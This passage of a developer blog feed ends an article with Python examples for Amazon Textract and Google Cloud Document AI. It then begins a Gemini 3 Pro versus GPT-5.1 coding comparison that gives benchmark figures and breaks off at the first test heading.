&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Quick peek at found tables
&lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BlockType&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TABLE&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Detected a table with Id:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There is a lot of other complex stuff that you can do with Textract. For more details, check out the &lt;a href="https://docs.aws.amazon.com/textract/latest/dg/what-is-textract.html" rel="noopener noreferrer"&gt;Textract documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In production you usually wire this up with S3 triggers and Lambda so new documents are picked up and processed by themselves.&lt;/p&gt;

&lt;p&gt;Here's a quick intro to Amazon Textract. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/5Cs4_e2CJRo"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://cloud.google.com/document-ai" rel="noopener noreferrer"&gt;5. Google Cloud Document AI&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fztf6r43zpl0z6v5on0g1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fztf6r43zpl0z6v5on0g1.png" alt="Google Cloud Document AI"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Document AI is Google Cloud’s document stack that gives you ready made processors for invoices, receipts, forms, IDs and general OCR. You pick a processor, send it a file and get back a &lt;code&gt;Document&lt;/code&gt; object with text, structure, entities and layout info, not just raw strings.&lt;/p&gt;

&lt;p&gt;The nice part is how it fits into the rest of GCP (Google Cloud Platform). You can drop files into Cloud Storage, trigger processing with Pub/Sub or Cloud Functions or Cloud Run, then push clean data into BigQuery or your app.&lt;/p&gt;

&lt;h3&gt;
  
  
  Use it when you want:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prebuilt processors&lt;/strong&gt; - invoice, receipt, form, ID and general OCR processors that work out of the box.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tables and forms&lt;/strong&gt; - key value pairs and tables straight from scanned PDFs and images.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom models&lt;/strong&gt; - custom extractors, classifiers and splitters when your docs do not match the prebuilt ones.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud pipelines&lt;/strong&gt; - runs close to Cloud Storage, Cloud Run and Vertex AI so it is easy to wire into existing GCP setups.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Code Example: Send a PDF and read the text
&lt;/h3&gt;

&lt;p&gt;This is the usual Python flow. You create a processor in the console, grab its ID, then call it from your code.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;

&lt;span class="n"&gt;project_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-project-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;location&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;us&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;processor_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-processor-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;file_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;path/to/document.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;DocumentProcessorServiceClient&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;processor_path&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;project_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;location&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;processor_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rb&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;file_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;raw_document&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RawDocument&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;file_bytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;mime_type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;application/pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;ProcessRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;raw_document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;raw_document&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;process_document&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;doc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;document&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;doc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You send raw bytes plus the MIME type, Document AI runs the selected processor and you get back a &lt;code&gt;Document&lt;/code&gt; object. For quick use cases, grabbing &lt;code&gt;doc.text&lt;/code&gt; is enough.&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Turn a parsed form into fields
&lt;/h3&gt;

&lt;p&gt;If you use a form style processor, Document AI already marks fields as key value pairs, which you can loop over and map into your own schema.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;form_doc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc&lt;/span&gt;  &lt;span class="c1"&gt;# from the previous example. see above
&lt;/span&gt;
&lt;span class="n"&gt;fields&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;page&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;form_doc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;page&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;form_fields&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text_anchor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text_anchor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;conf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;confidence&lt;/span&gt;
        &lt;span class="n"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conf&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conf&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; (conf &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;conf&lt;/span&gt;&lt;span class="si"&gt;:&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the point where a scanned form basically becomes a Python dict. From here, you can push the data into BigQuery, Firestore or any service you use on GCP.&lt;/p&gt;

&lt;p&gt;This is just a start, and there's a lot more to it. Visit the &lt;a href="https://cloud.google.com/document-ai" rel="noopener noreferrer"&gt;documentation&lt;/a&gt; to learn more.&lt;/p&gt;

&lt;p&gt;Here's a quick introduction to Google Cloud Document AI. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/F_jyoe1lQhg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;If you think of any other handy AI tools that I haven't covered in this article, do share them in the comments section below. ✌️&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;So, that is it for this article. Thank you so much for reading! 🎉🫡&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbo0rn1n2pcuvbtd13m.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbo0rn1n2pcuvbtd13m.gif" alt="Bye Bye Ryan Gosling GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>opensource</category>
      <category>rag</category>
      <category>productivity</category>
    </item>
    <item>
      <title>✨Gemini 3 Pro vs GPT 5.1: Which One Codes Better? 🚀</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Tue, 25 Nov 2025 14:02:17 +0000</pubDate>
      <link>https://forem.com/composiodev/gemini-3-pro-vs-gpt-51-which-one-codes-better-1nld</link>
      <guid>https://forem.com/composiodev/gemini-3-pro-vs-gpt-51-which-one-codes-better-1nld</guid>
      <description>&lt;p&gt;Gemini 3 Pro just dropped, and it is already getting a lot of attention for its reasoning and long context abilities.&lt;/p&gt;

&lt;p&gt;But now, the natural question is, "How well does it code?"&lt;/p&gt;

&lt;p&gt;And does it actually outperform GPT 5.1 Codex, which, in my tests, has been the best so far (better than Claude 4.5 Sonnet) on real tasks?&lt;/p&gt;

&lt;p&gt;To find out, I put it side by side with GPT 5.1 and tested both models on two fundamental tasks: a UI build and a complete agent workflow.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqhs1vxfwei2fuz6ho4r.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqhs1vxfwei2fuz6ho4r.gif" alt="Let's Go GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will go through the results in a moment, but first, let's have a quick TL;DR and a refresher on Gemini 3.&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you want a quick take, here is how both models performed in the test:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Gemini 3 Pro handled both the UI task and the agent build more cleanly, requiring very few follow-ups.&lt;/li&gt;
&lt;li&gt;The most significant difference showed up in the agent test, where Gemini 3 Pro actually followed the documentation and built it well. At the same time, GPT-5.1 had a few issues with the agent implementation.&lt;/li&gt;
&lt;li&gt;Even though in our test it's not very obvious, for everyday coding, Gemini 3 Pro feels like the safer bet.&lt;/li&gt;
&lt;li&gt;Latency is higher than GPT-5.1 Codex and can be frustrating for minor fixes.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you are doing real coding or building agents, Gemini 3 Pro is the better choice right now.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; The goal of this test is to show how much of a jump Gemini 3 Pro is compared to the best models we had before its release.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Brief on Gemini 3 Pro
&lt;/h2&gt;

&lt;p&gt;Gemini 3 was released this November 18th with state-of-the-art reasoning, pushed directly to Search with no waiting period or beta testing, unlike most Google models.&lt;/p&gt;

&lt;p&gt;Gemini 3 is Google's most intelligent model family to date, and is the state-of-the-art (SOTA) across a variety of benchmarks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvog83hggtz5on1xk0weu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvog83hggtz5on1xk0weu.png" alt="Gemini 3 Pro model stats"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, this model makes almost all the models we had till now, including GPT-5.1, Claude 4.5 Sonnet, look outdated. The difference in their stats is just insane.&lt;/p&gt;

&lt;p&gt;From these, here are the ones I find the most incredible:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;LMArena Elo: 1501 (crossing GPT-5.1 and Claude Sonnet 4.5)&lt;/li&gt;
&lt;li&gt;Humanity's Last Exam: 37.5% without tools (&lt;strong&gt;hardest&lt;/strong&gt; AGI benchmark available)&lt;/li&gt;
&lt;li&gt;GPQA Diamond: 91.9% (PhD-level science reasoning)&lt;/li&gt;
&lt;li&gt;AIME 2025: 95% (high school mathematics)&lt;/li&gt;
&lt;li&gt;MathArena Apex: 23.4% (new state-of-the-art)&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;"Gemini 1 introduced native multimodality and long context to help AI understand the world. Gemini 2 added thinking, reasoning and tool use to create a foundation for agents.&lt;/p&gt;

&lt;p&gt;Now, Gemini 3 brings these capabilities together – so you can bring any idea to life."&lt;/p&gt;

&lt;p&gt;~ Google Deepmind&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fext9see4c8iy5ijiotgj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fext9see4c8iy5ijiotgj.png" alt="Google Deepmind claim on Gemini 3"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, it's built by putting together the good sides of the earlier Gemini models.&lt;/p&gt;

&lt;p&gt;Talking about its specs, it comes with a huge 1M input token context window and an output token limit of 64K.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🤔 &lt;strong&gt;What's the difference from Gemini 2.5 Pro?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Specs are almost the same. Both 2.5 Pro and 3 Pro give you about a 1M input window, 64K output and full multimodal support. But Gemini 3 Pro is a clear upgrade in &lt;strong&gt;how it thinks&lt;/strong&gt; with that context. It scores roughly 10 to 20 per cent higher on many reasoning benchmarks, takes a massive jump on complex tests like ARC-AGI-2 and SimpleQA, and performs better at long-context retrieval at the 1M scale.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9zge5q1715wnz0hmynfm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9zge5q1715wnz0hmynfm.png" alt="Gemini 3 hallucination"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There's just a percentage improvement in hallucination rate compared to Gemini 2.5 Pro, and Claude leads by a significant margin on this metric, which should've been better. We will test it shortly.&lt;/p&gt;

&lt;p&gt;Google is also clearly tuning this thing for real "agent"- style workflows, not just limited to chat. In practice, that means Gemini 3 Pro is built to run tools, browse, execute code, and integrate into your agentic workflows. As said, it's available everywhere; you can find it in all Google products.&lt;/p&gt;

&lt;p&gt;Google has launched it everywhere, so you can already get the idea of how confident they are in this model.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mb3qk7tzvr4y7xb37ur.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mb3qk7tzvr4y7xb37ur.png" alt="Gemini 3 availability"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Google has also launched &lt;strong&gt;Deep Think Mode&lt;/strong&gt; alongside Gemini 3 Pro, which isn't public yet, but it uses extended reasoning chains to work through complex problems. It's like taking a moment to think before answering user questions. It offers improvement over the raw Gemini 3 Pro.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Humanity's Last Exam: 41.0% (vs. 37.5% with standard Gemini 3 Pro)&lt;/li&gt;
&lt;li&gt;GPQA Diamond: 93.8% (vs. 91.9% with Gemini 3 Pro)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tezrky7jb0if43z5t6z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tezrky7jb0if43z5t6z.png" alt="Gemini 3 Deep Think"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;They are running safety checks before the public release to ensure it isn't misused.&lt;/p&gt;

&lt;p&gt;To learn more about the model, see its model card here: &lt;a href="https://storage.googleapis.com/deepmind-media/Model-Cards/Gemini-3-Pro-Model-Card.pdf" rel="noopener noreferrer"&gt;Gemini 3 Pro Model Card&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Comparison
&lt;/h2&gt;

&lt;p&gt;Now, let's start with the coding test. We will be comparing Gemini 3 Pro with GPT-5.1 on two tasks.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;UI Test:&lt;/strong&gt; I've already seen dozens of videos and demos praising Gemini 3 for its frontend coding, so we will run one to see how well it handles a basic task.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Building an Agent:&lt;/strong&gt; We will make an agent from scratch, as it's also a model known to be great at agentic workflows.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
